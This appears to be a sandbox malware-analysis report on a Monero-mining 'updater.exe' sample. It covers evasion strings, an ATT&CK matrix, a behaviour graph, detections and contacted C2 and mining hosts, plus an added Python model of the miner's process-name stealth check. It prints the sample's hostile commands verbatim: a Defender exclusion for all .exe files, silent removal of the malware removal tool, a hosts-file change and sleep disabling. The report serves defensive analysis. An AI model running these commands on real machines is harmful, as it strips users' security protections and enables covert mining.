                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE#9
Source: conhost.exe, 00000027.00000003.2729787268.000002862EC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SAVSCAN.EXE,SPIDER.EXE,XCOMMSVR.EXE,PROCMON64A.EXE,PROCMON64.EXE,PROCMON.EXE,ANVIR.EXE,REGEDIT.EXE,MRT.EXE
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXEE_
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MGUI.EXE, NAVAPSVC.EXE, NAVAPW32.EXE,NAVW32.EXE,NSMDTR.EXE,OFCDOG.EXE,PAV.EXE,SAVSCAN.EXE,SPIDER.EXE,XCOMMSVR.EXE,PROCMON64A.EXE,PROCMON64.EXE,PROCMON.EXE,ANVIR.EXE,REGEDIT.EXE,MRT.EXE",
Source: conhost.exe, 00000027.00000003.2729787268.000002862EC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SAVSCAN.EXE,SPIDER.EXE,XCOMMSVR.EXE,PROCMON64A.EXE,PROCMON64.EXE,PROCMON.EXE,ANVIR.EXE,REGEDIT.EXE,MRT.EXESTEALTH-FULLSCREENALGO
Source: conhost.exe, 00000027.00000003.2729787268.000002862EC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: XTG1DJUKBUWPY1XDKR1HBJMYAYZX1RYDALGSGF6CDTAOGZGV5AJPBWXSTEALTH-TARGETSTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV
Source: conhost.exe, 00000027.00000003.2729787268.000002862EC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV
Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLUOT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE
Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEGRAMDATA=C:
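The process-name list recovered from conhost.exe memory above is keyed STEALTH-TARGETS in the miner's configuration: it starts at TASKMGR.EXE and, per the adjacent strings, ends at MRT.EXE immediately before the STEALTH-FULLSCREEN key. The key name indicates a stealth mode driven by what is running on the host; the working assumption in the following added example (not code from the sample, its builder or Joe Sandbox) is that mining is suspended while any listed image is running, which is what makes CPU use look normal the moment Task Manager or Process Explorer is opened. The list is abridged to a few dozen verbatim entries from the dump, and the process snapshot and candidate tool list are constructed.

```python
"""Process-name stealth check reconstructed from the STEALTH-TARGETS memory string.

Added illustration for this report; not code from the sample, its builder or Joe Sandbox.
"""
import ntpath

# Abridged copy of the list recovered from conhost.exe memory (entries are verbatim,
# including the stray space in "MGUI.EXE, NAVAPSVC.EXE" and names containing spaces).
STEALTH_TARGETS_RAW = (
    "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,"
    "MODERNWARFARE.EXE,SHOOTERGAME.EXE,GENSHINIMPACT.EXE,VALORANT.EXE,CSGO.EXE,"
    "TEKKEN 7.EXE,PHOTOSHOP.EXE,LEAGUE OF LEGENDS.EXE,ADOBE PREMIERE PRO.EXE,"
    "MGUI.EXE, NAVAPSVC.EXE, NAVAPW32.EXE,NAVW32.EXE,NSMDTR.EXE,OFCDOG.EXE,PAV.EXE,"
    "SAVSCAN.EXE,SPIDER.EXE,XCOMMSVR.EXE,PROCMON64A.EXE,PROCMON64.EXE,PROCMON.EXE,"
    "ANVIR.EXE,REGEDIT.EXE,MRT.EXE"
)


def parse_stealth_targets(raw: str) -> frozenset[str]:
    """Split the comma-separated list. Entries are trimmed (the dump has ", NAVAPSVC.EXE")
    and upper-cased because Win32 image names compare case-insensitively."""
    return frozenset(n.strip().upper() for n in raw.split(",") if n.strip())


def _image_name(path: str) -> str:
    """Bare image name from a path or a name; the list holds names, not paths."""
    return ntpath.basename(path).upper()


def triggering_processes(targets: frozenset[str], running: list[str]) -> list[str]:
    """Images in the snapshot that are on the watch list (sorted, upper-case)."""
    return sorted({_image_name(p) for p in running} & targets)


def miner_would_pause(targets: frozenset[str], running: list[str]) -> bool:
    """Assumed stealth rule: mining stops while any listed image is running."""
    return bool(triggering_processes(targets, running))


def non_triggering_tools(targets: frozenset[str], tools: list[str]) -> list[str]:
    """Analyst tools that can observe the miner without tripping the rule."""
    return [t for t in tools if _image_name(t) not in targets]


# Constructed snapshot of an analyst VM with Process Explorer open.
ANALYST_SNAPSHOT = [
    r"C:\Windows\System32\svchost.exe",
    r"C:\Windows\explorer.exe",
    r"C:\Tools\procexp64.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32\conhost.exe",
]
# Constructed list of tools an analyst might reach for.
CANDIDATE_TOOLS = ["procexp64.exe", "procmon.exe", "tasklist.exe", "powershell.exe",
                   "typeperf.exe", "wpr.exe"]

if __name__ == "__main__":
    targets = parse_stealth_targets(STEALTH_TARGETS_RAW)
    print("pauses:", miner_would_pause(targets, ANALYST_SNAPSHOT))         # True
    print("because of:", triggering_processes(targets, ANALYST_SNAPSHOT))  # ['PROCEXP64.EXE']
    print("safe tools:", non_triggering_tools(targets, CANDIDATE_TOOLS))
    # A renamed copy of the same tool is invisible to a name-based check.
    print("renamed procexp:", miner_would_pause(targets, [r"C:\Tools\pe64.exe"]))  # False
```

The practical consequence for triage: watch CPU with something not on the list (tasklist.exe, Get-Process from powershell.exe, typeperf.exe) or with a renamed copy of Process Explorer, since the check is by image name only.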
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6624
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7505
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2034
Source: C:\ProgramData\Google\Chrome\updater.exe Dropped PE file which has not been started: C:\Windows\Temp\maoxoafwbtki.sys
Source: C:\Windows\System32\conhost.exe API coverage: 0.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352 Thread sleep count: 6624 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352 Thread sleep count: 3194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3596 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796 Thread sleep count: 7505 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796 Thread sleep count: 2034 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6188 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\wusa.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (6 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\System32\conhost.exe Code function: 36_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 36_2_0000000140001160

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force (2 occurrences)
Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force (2 occurrences)
Source: C:\ProgramData\Google\Chrome\updater.exe Thread register set: target process: 2568
Source: C:\ProgramData\Google\Chrome\updater.exe Thread register set: target process: 5596
Source: C:\Users\user\Desktop\updater.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart (2 occurrences)
Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

                Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\updater.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MCSHIELD.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avguard.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cfp.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: msmpeng.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: aswupdsv.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mcshield.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AVENGINE.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avkwctl.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fsav32.exe
Source: conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ZLCLIENT.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ashServ.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ashwebsv.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xcommsvr.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Procmon.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fsdfwd.exe
Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avgemc.exe
MITRE ATT&CK Matrix (one line per tactic; the numbers in parentheses are the counts shown in the matrix cells)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Windows Management Instrumentation (11), Service Execution (1), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: Windows Service (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Windows Service (11), Process Injection (111), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), File and Directory Permissions Modification (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Process Injection (111), Obfuscated Files or Information (1), DLL Side-Loading (1), File Deletion (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Security Software Discovery (221), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), Remote System Discovery (1), System Information Discovery (12), Remote System Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Web Service (1), Encrypted Channel (11), Non-Standard Port (1), Ingress Tool Transfer (3), Non-Application Layer Protocol (4), Application Layer Protocol (5), Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 1478400 | Sample: updater.exe | Startdate: 22/07/2024 | Architecture: WINDOWS | Score: 100

Root node
  DNS/IP: pastebin.com; pool.supportxmr.com; 3 other IPs or domains
  Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
  Signature on pastebin.com: Connects to a pastebin service (likely for C&C)
  Started: updater.exe (node 8); updater.exe (node 12); svchost.exe (node 14)

updater.exe (node 8)
  Dropped: C:\Windows\Temp\maoxoafwbtki.sys, PE32+
  Signatures: Multi AV Scanner detection for dropped file; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver
  Started: conhost.exe (node 16); powershell.exe (node 20); cmd.exe (node 22); 5 other processes (node 30)

updater.exe (node 12)
  Dropped: C:\ProgramData\Google\Chrome\updater.exe, PE32+; C:\Windows\System32\drivers\etc\hosts, ASCII
  Signatures: Uses powercfg.exe to modify the power settings; Modifies the hosts file; Modifies power options to not sleep / hibernate
  Started: powershell.exe (node 24); cmd.exe (node 26); powercfg.exe (node 28); 7 other processes (node 32)

conhost.exe (node 16)
  DNS/IP: pastebin.com 104.20.4.235, ports 443, 49706, 49707, CLOUDFLARENETUS, United States; koldiv.ru 77.222.57.251, ports 49705, 49708, 49723, SWEB-ASRU, Russian Federation; 2 other IPs or domains
  Signatures: Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

powershell.exe (node 20): started conhost.exe (node 34)
cmd.exe (node 22): started 2 other processes (node 46)
powershell.exe (node 24): signature Loading BitLocker PowerShell Module; started conhost.exe (node 36)
cmd.exe (node 26): started conhost.exe (node 38), wusa.exe (node 40)
powercfg.exe (node 28): started conhost.exe (node 42)
5 other processes (node 30): started 4 other processes (node 48)
7 other processes (node 32): started conhost.exe (node 44), 6 other processes (node 50)

Source | Detection | Scanner | Label
updater.exe | 66% | ReversingLabs | Win64.Infostealer.Tinba

Source | Detection | Scanner | Label
C:\ProgramData\Google\Chrome\updater.exe | 66% | ReversingLabs | Win64.Infostealer.Tinba
C:\Windows\Temp\maoxoafwbtki.sys | 5% | ReversingLabs |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://pastebin.com/raw/HpN5DV4T | 0% | Avira URL Cloud | safe
http://koldiv.ru | 100% | Avira URL Cloud | malware
https://pastebin.com/raw/xhASwz5fX | 0% | Avira URL Cloud | safe
http://koldiv.ru/api/endpoint.php | 100% | Avira URL Cloud | malware
http://koldiv.ruCESSOR_REVI | 0% | Avira URL Cloud | safe
http://koldiv.ru/http://koldiv.ru | 100% | Avira URL Cloud | malware
https://pastebin.com/raw/xhASwz5f | 0% | Avira URL Cloud | safe
https://pastebin.com/raw/xhASwz5fRunning | 0% | Avira URL Cloud | safe
https://xmrig.com/docs/algorithms | 0% | Avira URL Cloud | safe
https://172.94.1q | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Reputation
xmr.2miners.com | 162.19.139.184 | true | false | unknown
pool-fr.supportxmr.com | 141.94.96.71 | true | false | unknown
koldiv.ru | 77.222.57.251 | true | false | unknown
pastebin.com | 104.20.4.235 | true | true | unknown
pool.supportxmr.com | unknown | unknown | true | unknown
Name | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/xhASwz5f | false | Avira URL Cloud: safe | unknown
http://koldiv.ru/http://koldiv.ru | false | Avira URL Cloud: malware | unknown
http://koldiv.ru/api/endpoint.php | false | Avira URL Cloud: malware | unknown
https://pastebin.com/raw/HpN5DV4T | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/xhASwz5fRunning | conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://koldiv.ruCESSOR_REVI | conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pastebin.com/raw/xhASwz5fX | conhost.exe, 00000027.00000003.2152302371.000002862EC26000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
